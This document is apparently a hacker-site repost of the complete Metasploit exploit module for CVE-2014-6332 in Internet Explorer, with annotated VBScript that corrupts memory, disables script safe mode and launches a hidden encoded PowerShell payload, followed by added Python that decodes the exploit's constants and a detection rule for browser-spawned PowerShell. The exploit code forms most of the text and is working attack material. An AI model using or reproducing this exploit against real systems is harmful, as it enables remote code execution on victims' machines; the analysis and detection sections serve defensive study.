Released by 中国寒龙 (hackerschina.org): Windows IE browser OLE Automation Array remote code execution vulnerability (CVE-2014-6332, Metasploit module)

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Powershell

  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "3.0",
    :ua_maxver  => "10.0",
    :javascript => true,
    :os_name    => OperatingSystems::Match::WINDOWS,
    :rank       => ExcellentRanking
  })

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
      'Description'    => %q{
        This module exploits the Windows OLE Automation Array vulnerability known as CVE-2014-6332.
        The vulnerability affects Internet Explorer 3.0 through 11 on Windows 95 through Windows 10.
        PowerShell is required on the target machine. On Internet Explorer versions using Protected Mode,
        the user has to manually allow powershell.exe to execute in order to be compromised.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Robert Freeman', # IBM X-Force
          'yuange',         # twitter.com/yuange75
          'Rik van Duijn',  # twitter.com/rikvduijn
          'Wesley Neelen',  # security[at]forsec.nl
          'GradiusX <francescomifsud[at]gmail.com>',
          'b33f',           # @FuzzySec
        ],
      'References'     =>
        [
          [ 'CVE', '2014-6332' ],
          [ 'MSB', 'MS14-064' ],
          [ 'OSVDB', '114533' ],
          [ 'EDB', '35229' ],
          [ 'EDB', '35308' ],
          [ 'URL', 'http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows' ],
          [ 'URL', 'https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
        ],
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :ua_name => HttpClients::IE,
          :os_name => /win/i,
          :arch    => 'x86',
          :ua_ver  => lambda { |ver| ver.to_i.between?(4, 10) }
        },
      'DefaultOptions' =>
        {
          'HTTP::compression' => 'gzip'
        },
      'Payload'        =>
        {
          'BadChars'        => "\x00"
        },
      'Privileged'     => false,
      'DisclosureDate' => "Nov 13 2014",
      'DefaultTarget'  => 0))

    register_options(
      [
        # 'runas' makes ShellExecute request elevation (UAC prompt); 'open' runs as the current user.
        OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]),
      ], self.class )
  end

  # Builds the VBScript that triggers CVE-2014-6332 and uses the resulting
  # out-of-bounds array access to switch the script engine out of safe mode
  # (yuange's "God Mode"), after which runaaaa() from get_html() can call
  # CreateObject("Shell.Application") without a security prompt.
  def vbs_prepare()
    code = %Q|
    dim   aa()
    dim   ab()
    dim   a0
    dim   a1
    dim   a2
    dim   a3
    dim   win9x
    dim   intVersion
    dim   rnda
    dim   funclass
    dim   myarray

    Begin()

    function Begin()
      On Error Resume Next
      info=Navigator.UserAgent
      ' 32-bit IE only: the VARIANT and SAFEARRAY layouts below assume 4-byte pointers
      if(instr(info,"Win64")>0)   then
        exit   function
      end if
      if (instr(info,"MSIE")>0)   then
        intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
      else
        exit   function
      end if
      win9x=0
      BeginInit()
      If Create()=True Then
        ' Fake 32-bit SAFEARRAY descriptor: cDims=1, fFeatures=&h880, cbElements=1,
        ' cLocks=0, pvData=0, cElements=&h7FFF0000, lLbound=0. With pvData=0 and
        ' one-byte elements, an index into this array is an absolute address.
        myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
        myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
        if(intVersion<4) then
          ' Legacy branch kept from the original PoC: runshellcode() is not defined
          ' in this module, so on IE 3 this path does nothing.
          document.write("<br> IE")
          document.write(intVersion)
          runshellcode()
        else
          setnotsafemode()
        end if
      end if
    end function

    function BeginInit()
      Randomize()
      redim aa(5)
      redim ab(5)
      a0=13+17*rnd(6)
      a3=7+3*rnd(5)
    end function

    ' Retry the heap grooming until Over() reports that ab's buffer sits right
    ' behind aa's, so that out-of-bounds aa elements alias ab elements.
    function Create()
      On Error Resume Next
      dim i
      Create=False
      For i = 0 To 400
        If Over()=True Then
          '   document.write(i)
          Create=True
          Exit For
        End If
      Next
    end function

    sub testaa()
    end sub

    ' Leaks the address of the VBScript function object testaa by storing it
    ' in aa(a1) and retyping that element to VT_I4 through the aliased ab(0).
    ' Also parks myarray in aa(a1+2) and retypes it to VT_ARRAY/VT_VARIANT so
    ' the string bytes are used as a SAFEARRAY descriptor (arbitrary write).
    function mydata()
      On Error Resume Next
      i=testaa
      i=null
      redim  Preserve aa(a2)
      ab(0)=0
      aa(a1)=i
      ab(0)=6.36598737437801E-314
      aa(a1+2)=myarray
      ab(2)=1.74088534731324E-310
      mydata=aa(a1)
      redim  Preserve aa(a0)
    end function

    ' Walks from the function object to the script engine object, finds the
    ' safety-flags dword (value 14) and zeroes it through the fake array, then
    ' restores aa(a1+2) to VT_BSTR so the fake descriptor is never freed as a
    ' real SAFEARRAY.
    function setnotsafemode()
      On Error Resume Next
      i=mydata()
      i=readmemo(i+8)
      i=readmemo(i+16)
      j=readmemo(i+&h134)
      for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
          j=0
          redim  Preserve aa(a2)
          aa(a1+2)(i+&h11c+k)=ab(4)
          redim  Preserve aa(a0)
          j=0
          j=readmemo(i+&h120+k)
          Exit for
        end if
      next
      ab(2)=1.69759663316747E-313
      runaaaa()
    end function

    ' Triggers CVE-2014-6332: the ReDim Preserve to a0+&h8000000 elements cannot
    ' be allocated, but aa keeps the enlarged bound, so aa(a1) indexes past aa's
    ' real buffer. A double written to ab(0) is then read back as the VARIANT
    ' type of aa(a1); &h2f66 (NT layout) or &hB9AD (Win9x layout) confirms the
    ' overlap. Every call bumps a0 by a3 to reshape the heap until this works.
    function Over()
      On Error Resume Next
      dim type1,type2,type3
      Over=False
      a0=a0+a3
      a1=a0+2
      a2=a0+&h8000000
      redim  Preserve aa(a0)
      redim   ab(a0)
      redim  Preserve aa(a2)
      type1=1
      ab(0)=1.123456789012345678901234567890
      aa(a0)=10
      If(IsObject(aa(a1-1)) = False) Then
        if(intVersion<4) then
          mem=cint(a0+1)*16
          j=vartype(aa(a1-1))
          if((j=mem+4) or (j*8=mem+8)) then
            if(vartype(aa(a1-1))<>0)  Then
              If(IsObject(aa(a1)) = False ) Then
                type1=VarType(aa(a1))
              end if
            end if
          else
            redim  Preserve aa(a0)
            exit  function
          end if
        else
          if(vartype(aa(a1-1))<>0)  Then
            If(IsObject(aa(a1)) = False ) Then
              type1=VarType(aa(a1))
            end if
          end if
        end if
      end if
      If(type1=&h2f66) Then
        Over=True
      End If
      If(type1=&hB9AD) Then
        Over=True
        win9x=1
      End If
      redim  Preserve aa(a0)
    end function

    ' Arbitrary 4-byte read: store add+4 in aa(a1), retype it to VT_BSTR via
    ' ab(0), and lenb() returns the BSTR length prefix, i.e. the dword at add.
    function ReadMemo(add)
      On Error Resume Next
      redim  Preserve aa(a2)
      ab(0)=0
      aa(a1)=add+4
      ab(0)=1.69759663316747E-313
      ReadMemo=lenb(aa(a1))
      ab(0)=0
      redim  Preserve aa(a0)
    end function
    |
  end

  def get_html()
    if datastore['TRYUAC']
      tryuac = 'runas'
    else
      tryuac = 'open'
    end

    # cmd_psh_payload returns "powershell.exe <args>"; only the arguments are
    # passed to ShellExecute, which gets the executable name separately.
    payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
    payl.slice! "powershell.exe "
    prep = vbs_prepare()

    html = %Q|
    <!doctype html>
    <html>
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <body>
    <script language="VBScript">
    function runaaaa()
      On Error Resume Next
      set shell=createobject("Shell.Application")
      shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0
    end function
    </script>
    <script language="VBScript">
    #{prep}
    </script>
    </body>
    </html>
    |
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Requesting: #{request.uri}")
    send_exploit_html(cli, get_html())
  end
end
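The VBScript above steers the bug with a few "magic" doubles and a hand-built string whose meaning is not obvious from the source. The following Python is an added analysis helper, not part of the Metasploit module or the original post: it reinterprets those constants exactly as the 32-bit VBScript engine stores them and prints the VARIANT types and SAFEARRAY fields they encode. The only interpretation it adds is that the values Over() compares against (&h2f66 and &hB9AD) are the two 16-bit words of the probe double with the VT_BYREF bit (0x4000) cleared, which is consistent with both constants in the script; the VT_ and FADF_ names are the standard OLE Automation definitions.

```python
import struct

# Constants copied verbatim from the module's VBScript.
OVER_PROBE   = 1.123456789012345678901234567890  # Over(): written to ab(0), then VarType(aa(a1)) is tested
MYDATA_VT    = 6.36598737437801E-314             # mydata(): retypes aa(a1), which holds the function object
READMEMO_VT  = 1.69759663316747E-313             # ReadMemo(): retypes aa(a1) so lenb() reads memory
FAKEARRAY_VT = 1.74088534731324E-310             # mydata(): retypes aa(a1+2), which holds myarray
MYARRAY_WCHARS = [1, 2176, 1, 0, 0, 0, 0, 0, 0, 32767, 0, 0]  # the chrw() sequence that builds myarray

VT_BYREF = 0x4000
VT_NAMES = {0x0003: "VT_I4", 0x0008: "VT_BSTR", 0x200C: "VT_ARRAY|VT_VARIANT"}
FADF_HAVEVARTYPE, FADF_VARIANT = 0x0080, 0x0800
# 32-bit SAFEARRAY with one bound: cDims, fFeatures, cbElements, cLocks, pvData, cElements, lLbound
SAFEARRAY_FMT = "<HHIIIII"


def double_bits(x):
    """64-bit IEEE-754 pattern of x, i.e. the eight payload bytes of a VT_R8 VARIANT."""
    return struct.unpack("<Q", struct.pack("<d", x))[0]


def vt_words(x):
    """The 16-bit words at byte offsets 0 and 4 of the stored double.

    The payload bytes of ab(n) overlap the header of the out-of-bounds element
    aa(a1+n). Which word lands on the vt field depends on the heap layout (the
    script's NT versus Win9x cases), so the type constants carry the wanted
    type in both halves.
    """
    bits = double_bits(x)
    return bits & 0xFFFF, (bits >> 32) & 0xFFFF


def vartype_as_checked(word):
    """Interpretation: Over() sees the word with VT_BYREF cleared (0x6F66 -> 0x2F66)."""
    return word & ~VT_BYREF & 0xFFFF


def describe_type_constant(x):
    """Name the VARIANT type a constant installs, or flag halves that disagree."""
    lo, hi = vt_words(x)
    vt_name = VT_NAMES.get(lo, "unknown") if lo == hi else "mismatch"
    return {"bits": double_bits(x), "word0": lo, "word4": hi, "type": vt_name}


def parse_fake_safearray(wchars):
    """Read the 12 UTF-16 code units of myarray as a 32-bit SAFEARRAY descriptor."""
    raw = b"".join(struct.pack("<H", w) for w in wchars)
    names = ("cDims", "fFeatures", "cbElements", "cLocks", "pvData", "cElements", "lLbound")
    desc = dict(zip(names, struct.unpack(SAFEARRAY_FMT, raw)))
    desc["is_byte_array_at_address_zero"] = desc["pvData"] == 0 and desc["cbElements"] == 1
    desc["features_known"] = desc["fFeatures"] == (FADF_HAVEVARTYPE | FADF_VARIANT)
    return desc


if __name__ == "__main__":
    lo, hi = vt_words(OVER_PROBE)
    print("Over() probe: bits=%#018x word0=%#06x word4=%#06x -> checks %#06x / %#06x"
          % (double_bits(OVER_PROBE), lo, hi, vartype_as_checked(lo), vartype_as_checked(hi)))
    for label, c in (("mydata", MYDATA_VT), ("ReadMemo", READMEMO_VT), ("fake array", FAKEARRAY_VT)):
        print("%-10s %s" % (label, describe_type_constant(c)))
    print("myarray as SAFEARRAY:", parse_fake_safearray(MYARRAY_WCHARS))
```

Run it once and the three type constants resolve to VT_I4, VT_BSTR and VT_ARRAY|VT_VARIANT with identical halves, which is why the same doubles work on both heap layouts; the descriptor parse shows pvData=0 with one-byte elements and 0x7FFF0000 of them, so `aa(a1+2)(addr)` in setnotsafemode() is a write to an absolute address.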
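On the endpoint, what get_html() produces is iexplore.exe calling ShellExecute on powershell.exe with a hidden window (the trailing 0) and an encoded command, so the simplest high-value detection is "browser spawns PowerShell", decoding the -e argument for triage. The following Python is an added example and not part of the module: it runs that logic over three constructed process-creation events in a simple key=value line format (not real Sysmon output), where the second event mimics the shape of the module's launch with a harmless stand-in script. It generalizes from iexplore.exe to a small set of browsers, which is an assumption about what a team would want rather than anything the page states.

```python
import base64
import binascii
import re

BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}   # assumption: extend as needed
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell accepts unambiguous prefixes of its switches: -e, -en, -enc ... -encodedcommand, plus -ec.
ENCODED_FLAGS = {"-" + "encodedcommand"[:n] for n in range(1, 15)} | {"-ec"}
WINDOW_FLAGS = {"-" + "windowstyle"[:n] for n in range(1, 12)}
EVENT_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Parse one key=value event line; quoted values may contain spaces."""
    return {k: (q if q else u) for k, q, u in EVENT_RE.findall(line)}


def basename(path):
    """Final component of a Windows path, lower-cased (works on any host OS)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the script behind a PowerShell -e/-enc/-EncodedCommand argument, or None.

    PowerShell expects base64 of the UTF-16LE script; anything that does not
    decode that way is reported as None rather than raising.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENCODED_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def has_hidden_window(cmdline):
    """True when -w/-win/-windowstyle hidden is present, as in the module's launch."""
    tokens = [t.lower() for t in cmdline.split()]
    return any(t in WINDOW_FLAGS and tokens[i + 1] == "hidden" for i, t in enumerate(tokens[:-1]))


def analyze(lines):
    """Flag PowerShell started by a browser and enrich the hit with decoded command details."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if basename(ev.get("parent_image", "")) not in BROWSERS:
            continue
        if basename(ev.get("image", "")) not in POWERSHELL:
            continue
        cmdline = ev.get("cmdline", "")
        findings.append({
            "parent": basename(ev["parent_image"]),
            "hidden_window": has_hidden_window(cmdline),
            "decoded_command": decode_encoded_command(cmdline),
            "raw": cmdline,
        })
    return findings


def _b64_utf16le(script):
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry; the stand-in script is deliberately harmless.
SAMPLE_SCRIPT = "Write-Host 'stand-in for the stager'"
SAMPLE_EVENTS = [
    'parent_image="C:\\Windows\\explorer.exe" image="C:\\Windows\\System32\\notepad.exe" '
    'cmdline="notepad.exe C:\\notes.txt"',
    'parent_image="C:\\Program Files\\Internet Explorer\\iexplore.exe" '
    'image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell.exe -nop -w hidden -e ' + _b64_utf16le(SAMPLE_SCRIPT) + '"',
    'parent_image="C:\\Windows\\System32\\cmd.exe" '
    'image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"',
]

if __name__ == "__main__":
    for hit in analyze(SAMPLE_EVENTS):
        print("ALERT parent=%s hidden=%s decoded=%r" % (hit["parent"], hit["hidden_window"], hit["decoded_command"]))
```

The admin's scheduled PowerShell from cmd.exe is not flagged, only the browser-parented launch is, and the decoded text is what an analyst needs first. Note that with TRYUAC set the module uses the `runas` verb, so the same child process appears after a UAC consent prompt; the parent relationship is unchanged, so this rule still fires.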

Posted: 2024-08-08 21:55:28
